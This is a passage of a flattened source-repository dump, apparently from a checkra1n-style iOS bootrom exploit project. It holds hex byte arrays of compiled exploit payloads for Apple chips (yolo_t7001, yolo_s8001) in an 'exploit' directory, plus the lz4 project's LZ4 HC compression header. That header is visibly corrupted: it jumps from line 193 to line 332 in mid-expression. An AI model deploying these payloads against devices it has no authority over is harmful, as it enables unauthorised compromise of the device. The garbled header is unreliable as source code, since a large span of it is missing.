0x43, 0x44, 0x40, 0xb8, 0x64, 0x68, 0x1b, 0x12, 0x9f, 0x00, 0x05, 0x6b, 211 | 0xa1, 0xff, 0xff, 0x54, 0x66, 0x10, 0x1b, 0x33, 0x44, 0x00, 0x40, 0xb9, 212 | 0x83, 0x68, 0x1b, 0x12, 0x7f, 0x00, 0x06, 0x6b, 0x60, 0x01, 0x00, 0x54, 213 | 0x7f, 0x00, 0x08, 0x6b, 0xc1, 0xfe, 0xff, 0x54, 0xc9, 0x10, 0x1b, 0x12, 214 | 0x09, 0x40, 0xb5, 0x72, 0x89, 0x10, 0x10, 0x33, 0x44, 0x04, 0x40, 0xb9, 215 | 0x83, 0x68, 0x1b, 0x12, 0x7f, 0x00, 0x09, 0x6b, 0xe1, 0xfd, 0xff, 0x54, 216 | 0x42, 0x10, 0x00, 0x91, 0x87, 0x24, 0x00, 0x33, 0x47, 0x00, 0x00, 0xb9, 217 | 0xc0, 0x03, 0x5f, 0xd6, 0xe2, 0x03, 0x00, 0xaa, 0xc7, 0x41, 0xa6, 0x52, 218 | 0x07, 0x7c, 0x80, 0x72, 0x08, 0x54, 0xaa, 0x52, 0x08, 0x10, 0x80, 0x72, 219 | 0x09, 0x40, 0xb5, 0x52, 0x09, 0x7e, 0x80, 0x72, 0xea, 0x40, 0x40, 0x51, 220 | 0x0b, 0x01, 0x02, 0x11, 0x43, 0x44, 0x40, 0xb8, 0x7f, 0x00, 0x07, 0x6b, 221 | 0x64, 0x10, 0x48, 0x7a, 0xa1, 0xff, 0xff, 0x54, 0x43, 0x90, 0x40, 0x29, 222 | 0x63, 0x6c, 0x1c, 0x12, 0x9f, 0x00, 0x0a, 0x6b, 0x84, 0x10, 0x4b, 0x7a, 223 | 0x60, 0x00, 0x49, 0x7a, 0xe1, 0xfe, 0xff, 0x54, 0x43, 0x00, 0x40, 0xb9, 224 | 0x44, 0x0c, 0x40, 0xb9, 0x63, 0x00, 0x04, 0x4b, 0x84, 0x7c, 0x1a, 0x53, 225 | 0x9f, 0x94, 0x00, 0x71, 0x60, 0x08, 0x43, 0x7a, 0x01, 0xfe, 0xff, 0x54, 226 | 0x42, 0x30, 0x00, 0x91, 0x43, 0x4c, 0x40, 0xb8, 0x64, 0x7c, 0x1a, 0x53, 227 | 0x9f, 0x94, 0x00, 0x71, 0xa1, 0xff, 0xff, 0x54, 0x63, 0x64, 0x00, 0x13, 228 | 0x47, 0x00, 0x00, 0x18, 0x47, 0xd8, 0x23, 0xb8, 0xc0, 0x03, 0x5f, 0xd6, 229 | 0xe2, 0x03, 0x00, 0xaa, 0x03, 0x28, 0xb7, 0x52, 0x23, 0x21, 0x80, 0x72, 230 | 0x24, 0x40, 0xa6, 0x52, 0x24, 0x25, 0x80, 0x72, 0x05, 0x20, 0xb7, 0x52, 231 | 0x25, 0x21, 0x80, 0x72, 0x66, 0xa0, 0xba, 0x52, 0xe6, 0xf3, 0x87, 0x72, 232 | 0xe7, 0xcb, 0xba, 0x52, 0x07, 0x78, 0x80, 0x72, 0x08, 0x50, 0xbe, 0x52, 233 | 0x08, 0x01, 0x80, 0x72, 0x09, 0x80, 0xa6, 0x52, 0x4a, 0xac, 0xc0, 0x29, 234 | 0x5f, 0x01, 0x03, 0x6b, 0x60, 0x01, 0x44, 0x7a, 0xa1, 0xff, 0xff, 0x54, 235 | 0x4a, 0x2c, 0x41, 0x29, 0x7f, 0x01, 0x06, 0x6b, 0x64, 0x11, 0x47, 0x7a, 236 | 0x40, 0x01, 0x45, 0x7a, 0x01, 0xff, 0xff, 0x54, 0x4a, 0xc0, 0x5f, 0xb8, 237 | 0x4a, 0x35, 0x09, 0x12, 0x5f, 0x01, 0x08, 0x6b, 0x81, 0xfe, 0xff, 0x54, 238 | 0x4a, 0x10, 0x00, 0xd1, 0x4b, 0x61, 0x00, 0xd1, 0x4c, 0xcd, 0x5f, 0xb8, 239 | 0x8d, 0x35, 0x09, 0x12, 0xbf, 0x01, 0x09, 0x6b, 0x80, 0x00, 0x00, 0x54, 240 | 0x5f, 0x01, 0x0b, 0xeb, 0x68, 0xff, 0xff, 0x54, 0xeb, 0xff, 0xff, 0x17, 241 | 0x8c, 0x5d, 0x05, 0x13, 0x08, 0x80, 0xa2, 0x52, 0x88, 0x65, 0x00, 0x33, 242 | 0x48, 0x01, 0x00, 0xb9, 0xc0, 0x03, 0x5f, 0xd6 243 | }; 244 | unsigned int yolo_t7001_bin_len = 2888; 245 | -------------------------------------------------------------------------------- /include/pongo/lz4/lz4hc.h: -------------------------------------------------------------------------------- 1 | /* 2 | LZ4 HC - High Compression Mode of LZ4 3 | Header File 4 | Copyright (C) 2011-2020, Yann Collet. 5 | BSD 2-Clause License (http://www.opensource.org/licenses/bsd-license.php) 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are 9 | met: 10 | 11 | * Redistributions of source code must retain the above copyright 12 | notice, this list of conditions and the following disclaimer. 13 | * Redistributions in binary form must reproduce the above 14 | copyright notice, this list of conditions and the following disclaimer 15 | in the documentation and/or other materials provided with the 16 | distribution. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 19 | "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT 20 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR 21 | A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT 22 | OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, 23 | SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT 24 | LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 25 | DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 26 | THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 27 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 29 | 30 | You can contact the author at : 31 | - LZ4 source repository : https://github.com/lz4/lz4 32 | - LZ4 public forum : https://groups.google.com/forum/#!forum/lz4c 33 | */ 34 | #ifndef LZ4_HC_H_19834876238432 35 | #define LZ4_HC_H_19834876238432 36 | 37 | #if defined (__cplusplus) 38 | extern "C" { 39 | #endif 40 | 41 | /* --- Dependency --- */ 42 | /* note : lz4hc requires lz4.h/lz4.c for compilation */ 43 | #include "lz4.h" /* stddef, LZ4LIB_API, LZ4_DEPRECATED */ 44 | 45 | 46 | /* --- Useful constants --- */ 47 | #define LZ4HC_CLEVEL_MIN 3 48 | #define LZ4HC_CLEVEL_DEFAULT 9 49 | #define LZ4HC_CLEVEL_OPT_MIN 10 50 | #define LZ4HC_CLEVEL_MAX 12 51 | 52 | 53 | /*-************************************ 54 | * Block Compression 55 | **************************************/ 56 | /*! LZ4_compress_HC() : 57 | * Compress data from `src` into `dst`, using the powerful but slower "HC" algorithm. 58 | * `dst` must be already allocated. 59 | * Compression is guaranteed to succeed if `dstCapacity >= LZ4_compressBound(srcSize)` (see "lz4.h") 60 | * Max supported `srcSize` value is LZ4_MAX_INPUT_SIZE (see "lz4.h") 61 | * `compressionLevel` : any value between 1 and LZ4HC_CLEVEL_MAX will work. 62 | * Values > LZ4HC_CLEVEL_MAX behave the same as LZ4HC_CLEVEL_MAX. 63 | * @return : the number of bytes written into 'dst' 64 | * or 0 if compression fails. 65 | */ 66 | LZ4LIB_API int LZ4_compress_HC (const char* src, char* dst, int srcSize, int dstCapacity, int compressionLevel); 67 | 68 | 69 | /* Note : 70 | * Decompression functions are provided within "lz4.h" (BSD license) 71 | */ 72 | 73 | 74 | /*! LZ4_compress_HC_extStateHC() : 75 | * Same as LZ4_compress_HC(), but using an externally allocated memory segment for `state`. 76 | * `state` size is provided by LZ4_sizeofStateHC(). 77 | * Memory segment must be aligned on 8-bytes boundaries (which a normal malloc() should do properly). 78 | */ 79 | LZ4LIB_API int LZ4_sizeofStateHC(void); 80 | LZ4LIB_API int LZ4_compress_HC_extStateHC(void* stateHC, const char* src, char* dst, int srcSize, int maxDstSize, int compressionLevel); 81 | 82 | 83 | /*! LZ4_compress_HC_destSize() : v1.9.0+ 84 | * Will compress as much data as possible from `src` 85 | * to fit into `targetDstSize` budget. 86 | * Result is provided in 2 parts : 87 | * @return : the number of bytes written into 'dst' (necessarily <= targetDstSize) 88 | * or 0 if compression fails. 89 | * `srcSizePtr` : on success, *srcSizePtr is updated to indicate how much bytes were read from `src` 90 | */ 91 | LZ4LIB_API int LZ4_compress_HC_destSize(void* stateHC, 92 | const char* src, char* dst, 93 | int* srcSizePtr, int targetDstSize, 94 | int compressionLevel); 95 | 96 | 97 | /*-************************************ 98 | * Streaming Compression 99 | * Bufferless synchronous API 100 | **************************************/ 101 | typedef union LZ4_streamHC_u LZ4_streamHC_t; /* incomplete type (defined later) */ 102 | 103 | /*! LZ4_createStreamHC() and LZ4_freeStreamHC() : 104 | * These functions create and release memory for LZ4 HC streaming state. 105 | * Newly created states are automatically initialized. 106 | * A same state can be used multiple times consecutively, 107 | * starting with LZ4_resetStreamHC_fast() to start a new stream of blocks. 108 | */ 109 | LZ4LIB_API LZ4_streamHC_t* LZ4_createStreamHC(void); 110 | LZ4LIB_API int LZ4_freeStreamHC (LZ4_streamHC_t* streamHCPtr); 111 | 112 | /* 113 | These functions compress data in successive blocks of any size, 114 | using previous blocks as dictionary, to improve compression ratio. 115 | One key assumption is that previous blocks (up to 64 KB) remain read-accessible while compressing next blocks. 116 | There is an exception for ring buffers, which can be smaller than 64 KB. 117 | Ring-buffer scenario is automatically detected and handled within LZ4_compress_HC_continue(). 118 | 119 | Before starting compression, state must be allocated and properly initialized. 120 | LZ4_createStreamHC() does both, though compression level is set to LZ4HC_CLEVEL_DEFAULT. 121 | 122 | Selecting the compression level can be done with LZ4_resetStreamHC_fast() (starts a new stream) 123 | or LZ4_setCompressionLevel() (anytime, between blocks in the same stream) (experimental). 124 | LZ4_resetStreamHC_fast() only works on states which have been properly initialized at least once, 125 | which is automatically the case when state is created using LZ4_createStreamHC(). 126 | 127 | After reset, a first "fictional block" can be designated as initial dictionary, 128 | using LZ4_loadDictHC() (Optional). 129 | 130 | Invoke LZ4_compress_HC_continue() to compress each successive block. 131 | The number of blocks is unlimited. 132 | Previous input blocks, including initial dictionary when present, 133 | must remain accessible and unmodified during compression. 134 | 135 | It's allowed to update compression level anytime between blocks, 136 | using LZ4_setCompressionLevel() (experimental). 137 | 138 | 'dst' buffer should be sized to handle worst case scenarios 139 | (see LZ4_compressBound(), it ensures compression success). 140 | In case of failure, the API does not guarantee recovery, 141 | so the state _must_ be reset. 142 | To ensure compression success 143 | whenever `dst` buffer size cannot be made >= LZ4_compressBound(), 144 | consider using LZ4_compress_HC_continue_destSize(). 145 | 146 | Whenever previous input blocks can't be preserved unmodified in-place during compression of next blocks, 147 | it's possible to copy the last blocks into a more stable memory space, using LZ4_saveDictHC(). 148 | Return value of LZ4_saveDictHC() is the size of dictionary effectively saved into 'safeBuffer' (<= 64 KB) 149 | 150 | After completing a streaming compression, 151 | it's possible to start a new stream of blocks, using the same LZ4_streamHC_t state, 152 | just by resetting it, using LZ4_resetStreamHC_fast(). 153 | */ 154 | 155 | LZ4LIB_API void LZ4_resetStreamHC_fast(LZ4_streamHC_t* streamHCPtr, int compressionLevel); /* v1.9.0+ */ 156 | LZ4LIB_API int LZ4_loadDictHC (LZ4_streamHC_t* streamHCPtr, const char* dictionary, int dictSize); 157 | 158 | LZ4LIB_API int LZ4_compress_HC_continue (LZ4_streamHC_t* streamHCPtr, 159 | const char* src, char* dst, 160 | int srcSize, int maxDstSize); 161 | 162 | /*! LZ4_compress_HC_continue_destSize() : v1.9.0+ 163 | * Similar to LZ4_compress_HC_continue(), 164 | * but will read as much data as possible from `src` 165 | * to fit into `targetDstSize` budget. 166 | * Result is provided into 2 parts : 167 | * @return : the number of bytes written into 'dst' (necessarily <= targetDstSize) 168 | * or 0 if compression fails. 169 | * `srcSizePtr` : on success, *srcSizePtr will be updated to indicate how much bytes were read from `src`. 170 | * Note that this function may not consume the entire input. 171 | */ 172 | LZ4LIB_API int LZ4_compress_HC_continue_destSize(LZ4_streamHC_t* LZ4_streamHCPtr, 173 | const char* src, char* dst, 174 | int* srcSizePtr, int targetDstSize); 175 | 176 | LZ4LIB_API int LZ4_saveDictHC (LZ4_streamHC_t* streamHCPtr, char* safeBuffer, int maxDictSize); 177 | 178 | 179 | 180 | /*^********************************************** 181 | * !!!!!! STATIC LINKING ONLY !!!!!! 182 | ***********************************************/ 183 | 184 | /*-****************************************************************** 185 | * PRIVATE DEFINITIONS : 186 | * Do not use these definitions directly. 187 | * They are merely exposed to allow static allocation of `LZ4_streamHC_t`. 188 | * Declare an `LZ4_streamHC_t` directly, rather than any type below. 189 | * Even then, only do so in the context of static linking, as definitions may change between versions. 190 | ********************************************************************/ 191 | 192 | #define LZ4HC_DICTIONARY_LOGSIZE 16 193 | #define LZ4HC_MAXD (1<= LZ4HC_CLEVEL_OPT_MIN. 332 | */ 333 | LZ4LIB_STATIC_API void LZ4_favorDecompressionSpeed( 334 | LZ4_streamHC_t* LZ4_streamHCPtr, int favor); 335 | 336 | /*! LZ4_resetStreamHC_fast() : v1.9.0+ 337 | * When an LZ4_streamHC_t is known to be in a internally coherent state, 338 | * it can often be prepared for a new compression with almost no work, only 339 | * sometimes falling back to the full, expensive reset that is always required 340 | * when the stream is in an indeterminate state (i.e., the reset performed by 341 | * LZ4_resetStreamHC()). 342 | * 343 | * LZ4_streamHCs are guaranteed to be in a valid state when: 344 | * - returned from LZ4_createStreamHC() 345 | * - reset by LZ4_resetStreamHC() 346 | * - memset(stream, 0, sizeof(LZ4_streamHC_t)) 347 | * - the stream was in a valid state and was reset by LZ4_resetStreamHC_fast() 348 | * - the stream was in a valid state and was then used in any compression call 349 | * that returned success 350 | * - the stream was in an indeterminate state and was used in a compression 351 | * call that fully reset the state (LZ4_compress_HC_extStateHC()) and that 352 | * returned success 353 | * 354 | * Note: 355 | * A stream that was last used in a compression call that returned an error 356 | * may be passed to this function. However, it will be fully reset, which will 357 | * clear any existing history and settings from the context. 358 | */ 359 | LZ4LIB_STATIC_API void LZ4_resetStreamHC_fast( 360 | LZ4_streamHC_t* LZ4_streamHCPtr, int compressionLevel); 361 | 362 | /*! LZ4_compress_HC_extStateHC_fastReset() : 363 | * A variant of LZ4_compress_HC_extStateHC(). 364 | * 365 | * Using this variant avoids an expensive initialization step. It is only safe 366 | * to call if the state buffer is known to be correctly initialized already 367 | * (see above comment on LZ4_resetStreamHC_fast() for a definition of 368 | * "correctly initialized"). From a high level, the difference is that this 369 | * function initializes the provided state with a call to 370 | * LZ4_resetStreamHC_fast() while LZ4_compress_HC_extStateHC() starts with a 371 | * call to LZ4_resetStreamHC(). 372 | */ 373 | LZ4LIB_STATIC_API int LZ4_compress_HC_extStateHC_fastReset ( 374 | void* state, 375 | const char* src, char* dst, 376 | int srcSize, int dstCapacity, 377 | int compressionLevel); 378 | 379 | /*! LZ4_attach_HC_dictionary() : 380 | * This is an experimental API that allows for the efficient use of a 381 | * static dictionary many times. 382 | * 383 | * Rather than re-loading the dictionary buffer into a working context before 384 | * each compression, or copying a pre-loaded dictionary's LZ4_streamHC_t into a 385 | * working LZ4_streamHC_t, this function introduces a no-copy setup mechanism, 386 | * in which the working stream references the dictionary stream in-place. 387 | * 388 | * Several assumptions are made about the state of the dictionary stream. 389 | * Currently, only streams which have been prepared by LZ4_loadDictHC() should 390 | * be expected to work. 391 | * 392 | * Alternatively, the provided dictionary stream pointer may be NULL, in which 393 | * case any existing dictionary stream is unset. 394 | * 395 | * A dictionary should only be attached to a stream without any history (i.e., 396 | * a stream that has just been reset). 397 | * 398 | * The dictionary will remain attached to the working stream only for the 399 | * current stream session. Calls to LZ4_resetStreamHC(_fast) will remove the 400 | * dictionary context association from the working stream. The dictionary 401 | * stream (and source buffer) must remain in-place / accessible / unchanged 402 | * through the lifetime of the stream session. 403 | */ 404 | LZ4LIB_STATIC_API void LZ4_attach_HC_dictionary( 405 | LZ4_streamHC_t *working_stream, 406 | const LZ4_streamHC_t *dictionary_stream); 407 | 408 | #if defined (__cplusplus) 409 | } 410 | #endif 411 | 412 | #endif /* LZ4_HC_SLO_098092834 */ 413 | #endif /* LZ4_HC_STATIC_LINKING_ONLY */ -------------------------------------------------------------------------------- /include/exploit/checkra1n/yolo_s8001.h: -------------------------------------------------------------------------------- 1 | unsigned char yolo_s8001_bin[] = { 2 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 3 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xa5, 0x06, 0x00, 0x00, 4 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x38, 0xcd, 0x00, 0x00, 5 | 0x01, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00, 6 | 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 7 | 0x00, 0x00, 0x00, 0x00, 0x38, 0xcd, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 8 | 0x40, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 9 | 0x29, 0x06, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 10 | 0x38, 0xcd, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x80, 11 | 0x01, 0x00, 0x00, 0x00, 0x00, 0x44, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00, 12 | 0x78, 0x1a, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 13 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 14 | 0x04, 0x44, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00, 0x78, 0x1a, 0x00, 0x00, 15 | 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 16 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x45, 0x00, 0x80, 17 | 0x01, 0x00, 0x00, 0x00, 0x78, 0x1a, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 18 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 19 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x60, 0x00, 20 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x38, 0xcd, 0x00, 0x00, 21 | 0x01, 0x00, 0x00, 0x00, 0xe0, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00, 22 | 0x00, 0x00, 0x00, 0x00, 0x03, 0x40, 0x05, 0x80, 0x00, 0x00, 0x00, 0x00, 23 | 0x00, 0x00, 0x00, 0x00, 0x38, 0xcd, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 24 | 0x00, 0x01, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 25 | 0x01, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 26 | 0x38, 0xcd, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x80, 0x01, 0x00, 0x80, 27 | 0x01, 0x00, 0x00, 0x00, 0x0c, 0x45, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00, 28 | 0x78, 0x1a, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 29 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 30 | 0x00, 0x46, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00, 0x78, 0x1a, 0x00, 0x00, 31 | 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 32 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x46, 0x00, 0x80, 33 | 0x01, 0x00, 0x00, 0x00, 0x78, 0x1a, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 34 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 35 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x40, 36 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x38, 0xcd, 0x00, 0x00, 37 | 0x01, 0x00, 0x00, 0x00, 0xa0, 0x01, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00, 38 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 39 | 0x00, 0x00, 0x00, 0x00, 0x38, 0xcd, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 40 | 0xc0, 0x01, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 41 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 42 | 0x38, 0xcd, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x40, 0x02, 0x00, 0x80, 43 | 0x01, 0x00, 0x00, 0x00, 0x58, 0x9f, 0x05, 0x80, 0x01, 0x00, 0x00, 0x00, 44 | 0x78, 0x1a, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 45 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 46 | 0x00, 0x44, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00, 0x3c, 0x04, 0x00, 0x00, 47 | 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 48 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x45, 0x00, 0x80, 49 | 0x01, 0x00, 0x00, 0x00, 0x3c, 0x04, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 50 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 51 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 52 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x38, 0xcd, 0x00, 0x00, 53 | 0x01, 0x00, 0x00, 0x00, 0x60, 0x02, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00, 54 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 55 | 0x00, 0x00, 0x00, 0x00, 0x38, 0xcd, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 56 | 0x80, 0x02, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 57 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 58 | 0x38, 0xcd, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x80, 59 | 0x01, 0x00, 0x00, 0x00, 0x00, 0x46, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00, 60 | 0x3c, 0x04, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 61 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 62 | 0x00, 0x06, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00, 0x3c, 0x04, 0x00, 0x00, 63 | 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 64 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 65 | 0x00, 0x00, 0x00, 0x00, 0x18, 0x04, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 66 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 67 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 68 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x38, 0xcd, 0x00, 0x00, 69 | 0x01, 0x00, 0x00, 0x00, 0x20, 0x03, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00, 70 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 71 | 0x00, 0x00, 0x00, 0x00, 0x38, 0xcd, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 72 | 0x40, 0x03, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 73 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 74 | 0x38, 0xcd, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0xc0, 0x03, 0x00, 0x80, 75 | 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 76 | 0x24, 0x9b, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 77 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 78 | 0x00, 0x40, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00, 0xb4, 0x03, 0x00, 0x00, 79 | 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 80 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 81 | 0x00, 0x00, 0x00, 0x00, 0x04, 0x04, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 82 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 83 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xa5, 0x06, 0x00, 0x80, 84 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x38, 0xcd, 0x00, 0x00, 85 | 0x01, 0x00, 0x00, 0x00, 0xe0, 0x03, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00, 86 | 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 87 | 0x00, 0x00, 0x00, 0x00, 0x38, 0xcd, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 88 | 0x00, 0x04, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 89 | 0x29, 0x06, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 90 | 0x38, 0xcd, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x80, 0x04, 0x00, 0x80, 91 | 0x01, 0x00, 0x00, 0x00, 0x00, 0x05, 0x05, 0x42, 0x01, 0x00, 0x00, 0x00, 92 | 0x78, 0x1a, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 93 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 94 | 0x04, 0x05, 0x05, 0x42, 0x01, 0x00, 0x00, 0x00, 0x78, 0x1a, 0x00, 0x00, 95 | 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 96 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x05, 0x05, 0x42, 97 | 0x01, 0x00, 0x00, 0x00, 0x78, 0x1a, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 98 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 99 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x60, 0x00, 100 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x38, 0xcd, 0x00, 0x00, 101 | 0x01, 0x00, 0x00, 0x00, 0xa0, 0x04, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00, 102 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 103 | 0x00, 0x00, 0x00, 0x00, 